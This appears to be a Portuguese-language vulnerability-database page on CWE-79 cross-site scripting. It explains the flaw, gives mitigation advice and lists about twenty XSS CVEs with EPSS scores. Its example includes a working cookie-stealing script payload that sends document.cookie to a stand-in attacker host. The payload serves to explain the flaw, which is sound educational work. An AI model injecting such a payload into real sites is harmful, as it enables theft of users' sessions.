Fallos del tipo CWE-79

28.634 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2017-16721—A Cross-site Scripting issue was discovered in Geovap Reliance SCADA Version 4.7.3 Update 2 and prior. This vulnerability could allow an unaEPSS 0.9%CVE-2019-13943—A vulnerability has been identified in EN100 Ethernet module DNP3 variant (All versions), EN100 Ethernet module IEC 61850 variant (All versiEPSS 0.9%CVE-2021-25062—Orders Tracking for WooCommerce < 1.1.10 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2024-23645MEDIUMGLPI reflected XSS in reports pagesEPSS 0.9%CVE-2016-5819—Moxa G3100V2 Series, editions prior to Version 2.8, and OnCell G3111/G3151/G3211/G3251 Series, editions prior to Version 1.7 allows a reflecEPSS 0.9%CVE-2015-9102—Multiple cross-site scripting (XSS) vulnerabilities in Synology Photo Station 6.0 before 6.0-2638 and 6.3 before 6.3-2962 allow remote autheEPSS 0.9%CVE-2022-2826LOWAn issue has been discovered in GitLab affecting all versions starting from 10.0 before 12.9.8, all versions starting from 12.10 before 12.1EPSS 0.9%CVE-2020-26225HIGHReflected XSS in PrestaShop Product CommentsEPSS 0.9%CVE-2021-21319MEDIUMSeveral stored XSSEPSS 0.9%CVE-2022-42989CRITICALERP Sankhya before v4.11b81 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Caixa de Entrada.EPSS 0.9%CVE-2018-3780—A missing sanitization of search results for an autocomplete field in NextCloud Server <13.0.5 could lead to a stored XSS requiring user-intEPSS 0.9%CVE-2018-0276—A vulnerability in Cisco WebEx Connect IM could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack agaEPSS 0.9%CVE-2024-57514MEDIUMThe TP-Link Archer A20 v3 router is vulnerable to Cross-site Scripting (XSS) due to improper handling of directory listing paths in the web EPSS 0.9%CVE-2019-1733MEDIUMCisco NX-OS Software NX-API Sandbox Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2022-40956MEDIUMWhen injecting an HTML base element, some requests would ignore the CSP's base-uri settings and accept the injected element's base instead. EPSS 0.9%CVE-2024-30875HIGHCross Site Scripting vulnerability in JavaScript Library jquery-ui v.1.13.1 allows a remote attacker to obtain sensitive information and exeEPSS 0.9%CVE-2021-34653MEDIUMWP Fountain <= 1.5.9 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2015-10073LOWtinymighty WikiSEO Meta Property Tag WikiSEO.body.php modifyHTML cross site scriptingEPSS 0.9%CVE-2023-29712MEDIUMCross Site Scripting vulnerability found in Vade Secure Gateway allows a remote attacker to execute arbitrary code via a crafted payload to EPSS 0.9%CVE-2021-24720—GeoDirectory < 2.1.1.3 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.9%